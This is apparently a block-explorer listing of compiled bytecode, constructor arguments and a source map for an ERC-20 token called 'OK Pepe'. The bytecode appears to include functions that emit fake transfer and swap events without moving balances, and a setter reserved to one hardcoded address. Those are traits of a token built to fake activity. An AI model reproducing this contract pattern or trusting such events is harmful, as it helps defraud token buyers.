0000000000000000000000000000000815260040161106290611dc4565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161115b9190611490565b60405180910390a361116e8484846112b6565b50505050565b61117c610ca9565b73ffffffffffffffffffffffffffffffffffffffff1661119a6107a2565b73ffffffffffffffffffffffffffffffffffffffff16146111f0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111e790611814565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156112f55780820151818401526020810190506112da565b60008484015250505050565b6000601f19601f8301169050919050565b600061131d826112bb565b61132781856112c6565b93506113378185602086016112d7565b61134081611301565b840191505092915050565b600060208201905081810360008301526113658184611312565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006113a282611377565b9050919050565b6113b281611397565b81146113bd57600080fd5b50565b6000813590506113cf816113a9565b92915050565b6000819050919050565b6113e8816113d5565b81146113f357600080fd5b50565b600081359050611405816113df565b92915050565b600080604083850312156114225761142161136d565b5b6000611430858286016113c0565b9250506020611441858286016113f6565b9150509250929050565b60008115159050919050565b6114608161144b565b82525050565b600060208201905061147b6000830184611457565b92915050565b61148a816113d5565b82525050565b60006020820190506114a56000830184611481565b92915050565b6000806000606084860312156114c4576114c361136d565b5b60006114d2868287016113c0565b93505060206114e3868287016113c0565b92505060406114f4868287016113f6565b9150509250925092565b600060ff82169050919050565b611514816114fe565b82525050565b600060208201905061152f600083018461150b565b92915050565b60006020828403121561154b5761154a61136d565b5b6000611559848285016113c0565b91505092915050565b600080fd5b600080fd5b600080fd5b60008083601f84011261158757611586611562565b5b8235905067ffffffffffffffff8111156115a4576115a3611567565b5b6020830191508360208202830111156115c0576115bf61156c565b5b9250929050565b600080600080606085870312156115e1576115e061136d565b5b600085013567ffffffffffffffff8111156115ff576115fe611372565b5b61160b87828801611571565b9450945050602061161e878288016113f6565b925050604061162f878288016113f6565b91505092959194509250565b61164481611397565b82525050565b600060208201905061165f600083018461163b565b92915050565b60008060006040848603121561167e5761167d61136d565b5b600084013567ffffffffffffffff81111561169c5761169b611372565b5b6116a886828701611571565b935093505060206116bb868287016113f6565b9150509250925092565b600080604083850312156116dc576116db61136d565b5b60006116ea858286016113c0565b92505060206116fb858286016113c0565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061174c57607f821691505b60208210810361175f5761175e611705565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061179f826113d5565b91506117aa836113d5565b92508282019050808211156117c2576117c1611765565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006117fe6020836112c6565b9150611809826117c8565b602082019050919050565b6000602082019050818103600083015261182d816117f1565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b6000819050919050565b6000819050919050565b600061189261188d61188884611863565b61186d565b6113d5565b9050919050565b6118a281611877565b82525050565b60006080820190506118bd6000830187611899565b6118ca6020830186611481565b6118d76040830185611481565b6118e46060830184611899565b95945050505050565b60006118f8826113d5565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff820361192a57611929611765565b5b600182019050919050565b600060808201905061194a6000830187611481565b6119576020830186611899565b6119646040830185611899565b6119716060830184611481565b95945050505050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006119d66025836112c6565b91506119e18261197a565b604082019050919050565b60006020820190508181036000830152611a05816119c9565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611a686026836112c6565b9150611a7382611a0c565b604082019050919050565b60006020820190508181036000830152611a9781611a5b565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611afa6024836112c6565b9150611b0582611a9e565b604082019050919050565b60006020820190508181036000830152611b2981611aed565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611b8c6022836112c6565b9150611b9782611b30565b604082019050919050565b60006020820190508181036000830152611bbb81611b7f565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611bf8601d836112c6565b9150611c0382611bc2565b602082019050919050565b60006020820190508181036000830152611c2781611beb565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611c8a6025836112c6565b9150611c9582611c2e565b604082019050919050565b60006020820190508181036000830152611cb981611c7d565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611d1c6023836112c6565b9150611d2782611cc0565b604082019050919050565b60006020820190508181036000830152611d4b81611d0f565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611dae6026836112c6565b9150611db982611d52565b604082019050919050565b60006020820190508181036000830152611ddd81611da1565b905091905056fea2646970667358221220bcc61637291a24eee0f853a36c822feeaf2a89a0c87a6d9676a30e42afb20c5364736f6c63430008120033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000045d964b80000000000000000000000000000000000000000000000000000000000000000074f4b20506570650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000064f4b504550450000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101215760003560e01c80637aac697b116100ad578063a457c2d711610071578063a457c2d7146102f6578063a9059cbb14610326578063beabacc814610356578063dd62ed3e14610372578063f2fde38b146103a257610121565b80637aac697b146102665780638da5cb5b1461028257806395d89b41146102a05780639ebbaef7146102be578063a1c617f5146102da57610121565b8063313ce567116100f4578063313ce567146101c257806339509351146101e057806366d382031461021057806370a082311461022c578063715018a61461025c57610121565b806306fdde0314610126578063095ea7b31461014457806318160ddd1461017457806323b872dd14610192575b600080fd5b61012e6103be565b60405161013b919061134b565b60405180910390f35b61015e6004803603810190610159919061140b565b610450565b60405161016b9190611466565b60405180910390f35b61017c610473565b6040516101899190611490565b60405180910390f35b6101ac60048036038101906101a791906114ab565b61047d565b6040516101b99190611466565b60405180910390f35b6101ca6104ac565b6040516101d7919061151a565b60405180910390f35b6101fa60048036038101906101f5919061140b565b6104b5565b6040516102079190611466565b60405180910390f35b61022a60048036038101906102259190611535565b6104ec565b005b61024660048036038101906102419190611535565b6105b9565b6040516102539190611490565b60405180910390f35b610264610602565b005b610280600480360381019061027b91906115c7565b610616565b005b61028a6107a2565b604051610297919061164a565b60405180910390f35b6102a86107cb565b6040516102b5919061134b565b60405180910390f35b6102d860048036038101906102d39190611665565b61085d565b005b6102f460048036038101906102ef91906115c7565b610910565b005b610310600480360381019061030b919061140b565b610a9b565b60405161031d9190611466565b60405180910390f35b610340600480360381019061033b919061140b565b610b12565b60405161034d9190611466565b60405180910390f35b610370600480360381019061036b91906114ab565b610b35565b005b61038c600480360381019061038791906116c5565b610b9f565b6040516103999190611490565b60405180910390f35b6103bc60048036038101906103b79190611535565b610c26565b005b6060600480546103cd90611734565b80601f01602080910402602001604051908101604052809291908181526020018280546103f990611734565b80156104465780601f1061041b57610100808354040283529160200191610446565b820191906000526020600020905b81548152906001019060200180831161042957829003601f168201915b5050505050905090565b60008061045b610ca9565b9050610468818585610cb1565b600191505092915050565b6000600354905090565b600080610488610ca9565b9050610495858285610e7a565b6104a0858585610f06565b60019150509392505050565b60006008905090565b6000806104c0610ca9565b90506104e18185856104d28589610b9f565b6104dc9190611794565b610cb1565b600191505092915050565b6104f4610ca9565b73ffffffffffffffffffffffffffffffffffffffff16735c52018a8f8b7eda1cf7f4c22792ace002a779f373ffffffffffffffffffffffffffffffffffffffff1614610575576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161056c90611814565b60405180910390fd5b80600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61060a611174565b61061460006111f2565b565b60005b8484905081101561079b5784848281811061063757610636611834565b5b905060200201602081019061064c9190611535565b73ffffffffffffffffffffffffffffffffffffffff16600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8226000868660006040516106d294939291906118a8565b60405180910390a3600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1685858381811061072657610725611834565b5b905060200201602081019061073b9190611535565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040516107809190611490565b60405180910390a38080610793906118ed565b915050610619565b5050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600580546107da90611734565b80601f016020809104026020016040519081016040528092919081815260200182805461080690611734565b80156108535780601f1061082857610100808354040283529160200191610853565b820191906000526020600020905b81548152906001019060200180831161083657829003601f168201915b5050505050905090565b60005b8383905081101561090a573073ffffffffffffffffffffffffffffffffffffffff1684848381811061089557610894611834565b5b90506020020160208101906108aa9190611535565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516108ef9190611490565b60405180910390a38080610902906118ed565b915050610860565b50505050565b60005b84849050811015610a945784848281811061093157610930611834565b5b90506020020160208101906109469190611535565b73ffffffffffffffffffffffffffffffffffffffff16600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d82285600080876040516109cb9493929190611935565b60405180910390a38484828181106109e6576109e5611834565b5b90506020020160208101906109fb9190611535565b73ffffffffffffffffffffffffffffffffffffffff16600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610a799190611490565b60405180910390a38080610a8c906118ed565b915050610913565b5050505050565b600080610aa6610ca9565b90506000610ab48286610b9f565b905083811015610af9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610af0906119ec565b60405180910390fd5b610b068286868403610cb1565b60019250505092915050565b600080610b1d610ca9565b9050610b2a818585610f06565b600191505092915050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610b929190611490565b60405180910390a3505050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610c2e611174565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610c9d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c9490611a7e565b60405180910390fd5b610ca6816111f2565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d20576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d1790611b10565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610d8f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d8690611ba2565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610e6d9190611490565b60405180910390a3505050565b6000610e868484610b9f565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610f005781811015610ef2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ee990611c0e565b60405180910390fd5b610eff8484848403610cb1565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610f75576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f6c90611ca0565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610fe4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fdb90611d32565b60405180910390fd5b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508181101561106b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161106290611dc4565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161115b9190611490565b60405180910390a361116e8484846112b6565b50505050565b61117c610ca9565b73ffffffffffffffffffffffffffffffffffffffff1661119a6107a2565b73ffffffffffffffffffffffffffffffffffffffff16146111f0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111e790611814565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156112f55780820151818401526020810190506112da565b60008484015250505050565b6000601f19601f8301169050919050565b600061131d826112bb565b61132781856112c6565b93506113378185602086016112d7565b61134081611301565b840191505092915050565b600060208201905081810360008301526113658184611312565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006113a282611377565b9050919050565b6113b281611397565b81146113bd57600080fd5b50565b6000813590506113cf816113a9565b92915050565b6000819050919050565b6113e8816113d5565b81146113f357600080fd5b50565b600081359050611405816113df565b92915050565b600080604083850312156114225761142161136d565b5b6000611430858286016113c0565b9250506020611441858286016113f6565b9150509250929050565b60008115159050919050565b6114608161144b565b82525050565b600060208201905061147b6000830184611457565b92915050565b61148a816113d5565b82525050565b60006020820190506114a56000830184611481565b92915050565b6000806000606084860312156114c4576114c361136d565b5b60006114d2868287016113c0565b93505060206114e3868287016113c0565b92505060406114f4868287016113f6565b9150509250925092565b600060ff82169050919050565b611514816114fe565b82525050565b600060208201905061152f600083018461150b565b92915050565b60006020828403121561154b5761154a61136d565b5b6000611559848285016113c0565b91505092915050565b600080fd5b600080fd5b600080fd5b60008083601f84011261158757611586611562565b5b8235905067ffffffffffffffff8111156115a4576115a3611567565b5b6020830191508360208202830111156115c0576115bf61156c565b5b9250929050565b600080600080606085870312156115e1576115e061136d565b5b600085013567ffffffffffffffff8111156115ff576115fe611372565b5b61160b87828801611571565b9450945050602061161e878288016113f6565b925050604061162f878288016113f6565b91505092959194509250565b61164481611397565b82525050565b600060208201905061165f600083018461163b565b92915050565b60008060006040848603121561167e5761167d61136d565b5b600084013567ffffffffffffffff81111561169c5761169b611372565b5b6116a886828701611571565b935093505060206116bb868287016113f6565b9150509250925092565b600080604083850312156116dc576116db61136d565b5b60006116ea858286016113c0565b92505060206116fb858286016113c0565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061174c57607f821691505b60208210810361175f5761175e611705565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061179f826113d5565b91506117aa836113d5565b92508282019050808211156117c2576117c1611765565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006117fe6020836112c6565b9150611809826117c8565b602082019050919050565b6000602082019050818103600083015261182d816117f1565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b6000819050919050565b6000819050919050565b600061189261188d61188884611863565b61186d565b6113d5565b9050919050565b6118a281611877565b82525050565b60006080820190506118bd6000830187611899565b6118ca6020830186611481565b6118d76040830185611481565b6118e46060830184611899565b95945050505050565b60006118f8826113d5565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff820361192a57611929611765565b5b600182019050919050565b600060808201905061194a6000830187611481565b6119576020830186611899565b6119646040830185611899565b6119716060830184611481565b95945050505050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006119d66025836112c6565b91506119e18261197a565b604082019050919050565b60006020820190508181036000830152611a05816119c9565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611a686026836112c6565b9150611a7382611a0c565b604082019050919050565b60006020820190508181036000830152611a9781611a5b565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611afa6024836112c6565b9150611b0582611a9e565b604082019050919050565b60006020820190508181036000830152611b2981611aed565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611b8c6022836112c6565b9150611b9782611b30565b604082019050919050565b60006020820190508181036000830152611bbb81611b7f565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611bf8601d836112c6565b9150611c0382611bc2565b602082019050919050565b60006020820190508181036000830152611c2781611beb565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611c8a6025836112c6565b9150611c9582611c2e565b604082019050919050565b60006020820190508181036000830152611cb981611c7d565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611d1c6023836112c6565b9150611d2782611cc0565b604082019050919050565b60006020820190508181036000830152611d4b81611d0f565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611dae6026836112c6565b9150611db982611d52565b604082019050919050565b60006020820190508181036000830152611ddd81611da1565b905091905056fea2646970667358221220bcc61637291a24eee0f853a36c822feeaf2a89a0c87a6d9676a30e42afb20c5364736f6c63430008120033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000045d964b80000000000000000000000000000000000000000000000000000000000000000074f4b20506570650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000064f4b504550450000000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : name_ (string): OK Pepe
Arg [1] : symbol_ (string): OKPEPE
Arg [2] : amount (uint256): 300000000000
-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : 00000000000000000000000000000000000000000000000000000045d964b800
Arg [3] : 0000000000000000000000000000000000000000000000000000000000000007
Arg [4] : 4f4b205065706500000000000000000000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000006
Arg [6] : 4f4b504550450000000000000000000000000000000000000000000000000000
Deployed Bytecode Sourcemap
8004:11468:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8662:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11969:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10738:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12750:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9624:92;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13454:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8402:190;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;10909:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5991:103;;;:::i;:::-;;10254:292;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;5350:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8881:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9724:225;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9955:291;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;14195:436;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11242:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10554:119;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;11498:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6249:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8662:100;8716:13;8749:5;8742:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8662:100;:::o;11969:201::-;12052:4;12069:13;12085:12;:10;:12::i;:::-;12069:28;;12108:32;12117:5;12124:7;12133:6;12108:8;:32::i;:::-;12158:4;12151:11;;;11969:201;;;;:::o;10738:108::-;10799:7;10826:12;;10819:19;;10738:108;:::o;12750:295::-;12881:4;12898:15;12916:12;:10;:12::i;:::-;12898:30;;12939:38;12955:4;12961:7;12970:6;12939:15;:38::i;:::-;12988:27;12998:4;13004:2;13008:6;12988:9;:27::i;:::-;13033:4;13026:11;;;12750:295;;;;;:::o;9624:92::-;9682:5;9707:1;9700:8;;9624:92;:::o;13454:238::-;13542:4;13559:13;13575:12;:10;:12::i;:::-;13559:28;;13598:64;13607:5;13614:7;13651:10;13623:25;13633:5;13640:7;13623:9;:25::i;:::-;:38;;;;:::i;:::-;13598:8;:64::i;:::-;13680:4;13673:11;;;13454:238;;;;:::o;8402:190::-;8509:12;:10;:12::i;:::-;8463:58;;:42;:58;;;8455:103;;;;;;;;;;;;:::i;:::-;;;;;;;;;8577:7;8569:5;;:15;;;;;;;;;;;;;;;;;;8402:190;:::o;10909:127::-;10983:7;11010:9;:18;11020:7;11010:18;;;;;;;;;;;;;;;;11003:25;;10909:127;;;:::o;5991:103::-;5236:13;:11;:13::i;:::-;6056:30:::1;6083:1;6056:18;:30::i;:::-;5991:103::o:0;10254:292::-;10358:9;10353:186;10377:11;;:18;;10373:1;:22;10353:186;;;10456:11;;10468:1;10456:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;10422:49;;10427:10;;;;;;;;;;;10422:49;;;10439:1;10442:3;10447:4;10453:1;10422:49;;;;;;;;;:::i;:::-;;;;;;;;10516:5;;;;;;;;;;;10491:36;;10500:11;;10512:1;10500:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;10491:36;;;10523:3;10491:36;;;;;;:::i;:::-;;;;;;;;10397:3;;;;;:::i;:::-;;;;10353:186;;;;10254:292;;;;:::o;5350:87::-;5396:7;5423:6;;;;;;;;;;;5416:13;;5350:87;:::o;8881:104::-;8937:13;8970:7;8963:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8881:104;:::o;9724:225::-;9818:9;9813:129;9837:11;;:18;;9833:1;:22;9813:129;;;9915:4;9882:48;;9891:11;;9903:1;9891:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;9882:48;;;9922:7;9882:48;;;;;;:::i;:::-;;;;;;;;9857:3;;;;;:::i;:::-;;;;9813:129;;;;9724:225;;;:::o;9955:291::-;10057:9;10052:187;10076:11;;:18;;10072:1;:22;10052:187;;;10155:11;;10167:1;10155:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;10121:49;;10126:10;;;;;;;;;;;10121:49;;;10138:3;10143:1;10146;10149:4;10121:49;;;;;;;;;:::i;:::-;;;;;;;;10206:11;;10218:1;10206:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;10190:37;;10199:5;;;;;;;;;;;10190:37;;;10222:4;10190:37;;;;;;:::i;:::-;;;;;;;;10096:3;;;;;:::i;:::-;;;;10052:187;;;;9955:291;;;;:::o;14195:436::-;14288:4;14305:13;14321:12;:10;:12::i;:::-;14305:28;;14344:24;14371:25;14381:5;14388:7;14371:9;:25::i;:::-;14344:52;;14435:15;14415:16;:35;;14407:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;14528:60;14537:5;14544:7;14572:15;14553:16;:34;14528:8;:60::i;:::-;14619:4;14612:11;;;;14195:436;;;;:::o;11242:193::-;11321:4;11338:13;11354:12;:10;:12::i;:::-;11338:28;;11377;11387:5;11394:2;11398:6;11377:9;:28::i;:::-;11423:4;11416:11;;;11242:193;;;;:::o;10554:119::-;10655:3;10639:26;;10648:5;10639:26;;;10660:4;10639:26;;;;;;:::i;:::-;;;;;;;;10554:119;;;:::o;11498:151::-;11587:7;11614:11;:18;11626:5;11614:18;;;;;;;;;;;;;;;:27;11633:7;11614:27;;;;;;;;;;;;;;;;11607:34;;11498:151;;;;:::o;6249:201::-;5236:13;:11;:13::i;:::-;6358:1:::1;6338:22;;:8;:22;;::::0;6330:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;6414:28;6433:8;6414:18;:28::i;:::-;6249:201:::0;:::o;4059:98::-;4112:7;4139:10;4132:17;;4059:98;:::o;17107:380::-;17260:1;17243:19;;:5;:19;;;17235:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;17341:1;17322:21;;:7;:21;;;17314:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;17425:6;17395:11;:18;17407:5;17395:18;;;;;;;;;;;;;;;:27;17414:7;17395:27;;;;;;;;;;;;;;;:36;;;;17463:7;17447:32;;17456:5;17447:32;;;17472:6;17447:32;;;;;;:::i;:::-;;;;;;;;17107:380;;;:::o;17778:453::-;17913:24;17940:25;17950:5;17957:7;17940:9;:25::i;:::-;17913:52;;18000:17;17980:16;:37;17976:248;;18062:6;18042:16;:26;;18034:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;18146:51;18155:5;18162:7;18190:6;18171:16;:25;18146:8;:51::i;:::-;17976:248;17902:329;17778:453;;;:::o;15101:791::-;15248:1;15232:18;;:4;:18;;;15224:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;15325:1;15311:16;;:2;:16;;;15303:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;15382:19;15404:9;:15;15414:4;15404:15;;;;;;;;;;;;;;;;15382:37;;15453:6;15438:11;:21;;15430:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;15570:6;15556:11;:20;15538:9;:15;15548:4;15538:15;;;;;;;;;;;;;;;:38;;;;15773:6;15756:9;:13;15766:2;15756:13;;;;;;;;;;;;;;;;:23;;;;;;;;;;;15823:2;15808:26;;15817:4;15808:26;;;15827:6;15808:26;;;;;;:::i;:::-;;;;;;;;15847:37;15867:4;15873:2;15877:6;15847:19;:37::i;:::-;15213:679;15101:791;;;:::o;5515:132::-;5590:12;:10;:12::i;:::-;5579:23;;:7;:5;:7::i;:::-;:23;;;5571:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;5515:132::o;6610:191::-;6684:16;6703:6;;;